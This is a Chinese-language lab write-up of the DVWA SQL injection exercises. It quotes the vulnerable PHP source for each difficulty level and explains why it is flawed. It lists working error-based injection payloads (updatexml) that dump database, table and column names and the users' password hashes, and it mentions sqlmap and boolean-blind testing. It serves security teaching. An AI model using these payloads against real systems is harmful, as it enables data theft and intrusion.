DVWA-SQL注入

一，Low

 

显示不同说明存在联合查询，接下来该确定注入类型是数字型还是字符型 

 

 判断回显

 利用回显获取信息

 mysql5以上默认在数据库中存放一个information_schema 的数据库，这个数据库中，需要记住三个表名，分别是SCHEMATA、TABLES和COLUMNS。

SCHEMATA表存储用户创建的所有数据库的库名，只要记住该表中的字段
SCHEMA_NAME,这个表中记录了数据库库名。

TABLES表存储用户创建的所有数据库 库名和表名，字段分别为：
TABLES_SCHEMA和TABLES_NAME。

COLUMNS表中存储用户创建的所有数据库的库名、表名、字段名，字段名分别为：
TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME.

 利用数据库获取表名

 

 使用BP进行解码，这个是ASCII

 

 利用表明获取字段

 

 利用字段（列）获取字段数据

 

 

 

使用报错注入：

获取数据库名

查询有几张表：

 

 获取表名

 获取字段名

 获取内容

报错注入完整流程：

获取数据库：
？id=1' and updatexml(1,concat(0x5e,(select database()),0x5e),1)#
查询库中有多少表：
？id=1' and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)#
查询表：
？id=1' and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)#
查询表中的列：
？id=1' and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x5e),1)#
查询数据：
？id=1' and updatexml(1,concat(0x5e,(select group_concat(user,0x3a,password) from users limit 0,1),0x5e),1)#

 

源码分析：

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?> 

分析步骤：

1，isset检测变量Submit是否已设置并且非 NULL，即判断用户是否点击了Submit按钮。
2，得到用户提交的数据 id
3，利用用户数据拼接成sql语句query
4，使用mysqli_query函数执行sql语句并返回结果给result，若出错，使用die函数报错
5，使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6，使用first、last变量获取row中的first_name、last_name字段，并使用echo打印 用户输入的id和        变量first、last
漏洞原因：
没有进行预编译

用户数据拼接了代码，没有实现代码、数据分离

没有进行敏感字符过滤

 二，Medium

 使用Hackbar试试POST

 

 

 源码分析：

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?> 

mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符，如输入单引号’则处理时会在其前面加上右斜杠\来进行转义，如果语句错误则输出相应的错误信息。其中受影响的字符如下：\x00  \n  \r  \ '  "  \x1a

分析步骤：
1，isset检测变量Submit是否已设置并且非 NULL，即判断用户是否点击了Submit按钮。
2，得到用户提交的数据 id，使用mysqli_real_escape_string函数进行转义
3，利用用户数据拼接成sql语句query
4，使用mysqli_query函数执行sql语句并返回结果给result，若出错，使用die函数报错
5，使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6，使用first、last变量获取row中的first_name、last_name字段，并使用echo打印 用户输入的id和       变量first、last
漏洞原因：
没有进行预编译

用户数据拼接了代码，没有实现代码、数据分离

没有很好的对敏感关键字进行过滤。想要利用mysqli_real_escape_string函数进行敏感字符过滤，但是mysqli_real_escape_string函数并不能过滤一些敏感的关键字（如 and or等），它的功能只是转义一些字符，仅成功过滤了'，属于开发者对函数功能了解的不够全，网络安全-php安全知识点中有对该函数的解释。

 

 

 剩下的按照以上操作就可以了

三，Hight

 

 剩下的按照以上做法就可以了

当输入1’时，

 说明报错注入没法使用

源码分析：

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?> 

主要步骤：
1，isset检测Session中的id变量是否已设置并且非 NULL
2，得到用户提交的数据 id
3，利用用户数据拼接成sql语句query，id当做字符串
4，使用mysqli_query函数执行sql语句并返回结果给result，若出错，使用die函数报错，错误是自       定义的
5，使用mysqli_fetch_assoc函数获取结果集的一行给变量row
6，使用first、last变量获取row中的first_name、last_name字段，并使用echo打印 用户输入的id和       变量first、last
漏洞原因：
没有进行预编译

用户数据拼接了代码，没有实现代码、数据分离

想要利用session和自定义错误返回来增加安全系数，成功的躲过了Error注入方式

四，使用SQLMap进行测试（LOW）

测试目标存在注入:

 使用BP获取Cookie

 添加Cookie再测试

 获取成功：

 查询当前用户下的所有数据库：

 

查询当前网站数据库的名称： 

 

 查询数据库中的表名：

 

 获取表中的字段名：

 

 获取字段内容：

 

 五，布尔盲注（LOW）

 

 2次返回的页面数据不同，说明存在布尔盲注

直接使用sqlmap进行查询

 

 下面的按照上面的做法一一尝试即可。